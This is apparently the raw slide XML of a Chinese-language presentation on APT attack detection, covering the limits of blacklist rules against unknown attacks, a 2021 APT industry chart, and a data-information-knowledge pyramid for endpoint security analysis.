            <a:ext cx="1229360" cy="2185035"/>
          </a:xfrm>
          <a:prstGeom prst="curvedRightArrow">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40" name="椭圆 39"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5293360" y="4824730"/>
            <a:ext cx="1059180" cy="1066165"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF5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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="椭圆 41"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5293360" y="2903220"/>
            <a:ext cx="1059180" cy="1066165"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>算法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="左弧形箭头 42"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6478905" y="3255645"/>
            <a:ext cx="1229360" cy="2185035"/>
          </a:xfrm>
          <a:prstGeom prst="curvedRightArrow">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panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="文本框 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7760970" y="4139565"/>
            <a:ext cx="2399665" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>高质量的数据是提升算法效果的基础</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="文本框 44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1699895" y="4111625"/>
            <a:ext cx="2399665" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>算法能力的加强有助于积累高质量的数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="圆角矩形 45"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5170805" y="6023610"/>
            <a:ext cx="1344295" cy="505460"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575"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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据能力</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>建设</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="圆角矩形 46"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5170805" y="2252345"/>
            <a:ext cx="1344295" cy="505460"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cmpd="sng">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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>算法能力</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>建设</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34A8CB2E-9810-4B74-9754-853CAF20AF69}"/>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APT</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攻击检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="73977" y="1980000"/>
            <a:ext cx="12032615" cy="1144905"/>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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检测系统的应用迫在眉睫，现有方法无法应对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>未知攻击方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中国</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是全球APT活动的首要地区性目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>黑名单规则无法应对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击中复杂多变的未知攻击方法，如0day漏洞、无文件攻击和白应用黑利用（living off the land）等；</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dirty="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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="559435" y="6089650"/>
            <a:ext cx="5104130" cy="396240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2021年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>事件中国境内行业分布情况</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1483995" y="3470208"/>
            <a:ext cx="3000375" cy="2181225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100" name="图片 99"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6515735" y="3124905"/>
            <a:ext cx="4253230" cy="2831465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="5956370"/>
            <a:ext cx="5104130" cy="396240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>美国国家安全局“APT-C-40”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>组织利用浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>漏洞实施无差别网络攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="标题 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F486A55-792C-4539-81EE-0E8E8D9F000A}"/>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终端数据金字塔</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="92710" y="2113915"/>
            <a:ext cx="12032615" cy="93218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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>终端行为数据</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分析技术的目标</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不应该是替代人解决一切网络安全问题</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，而是将安全数据分析、威胁事件的研判和响应的自动化做的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>极致的专家系统</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，以</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>延伸人对安全数据的感知能力，降低人对信息和知识深入认知的代价</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a: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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>达成上述目标，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如何组织并使用数据才是核心问题。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">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lang="zh-CN" altLang="en-US" dirty="0">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs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dirty="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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4086860" y="3107055"/>
            <a:ext cx="3512185" cy="2983230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="直接连接符 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1113790" y="5353685"/>
            <a:ext cx="9608185" cy="73025"/>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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="113665" y="5509895"/>
            <a:ext cx="3785235" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，原始未经过加工的：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>应用日志、主机日志、网络流量日志、蜜罐日志、网络架构数据、业务层数据等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7724775" y="4155440"/>
            <a:ext cx="4269740" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Information，基于规则和行为的匹配加工的数据，有明确意义和时效的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>各类检测日志，包括单数据源的检测和关联的检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>；各类评估日志，包括主动获取的资产数据、脆弱性数据等；威胁情报。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="259080" y="3658235"/>
            <a:ext cx="4269740" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Knowledge，归纳的信息，可演绎推理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>各类规范和知识库，如CWE、CNNVD、CAPEC、ATT&amp;CK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E3FA3F4-7B81-4377-91CE-8222646216D4}"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="5760000" cy="64800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IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-C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的主要功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4058920" y="2193925"/>
            <a:ext cx="6602730" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="10398" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
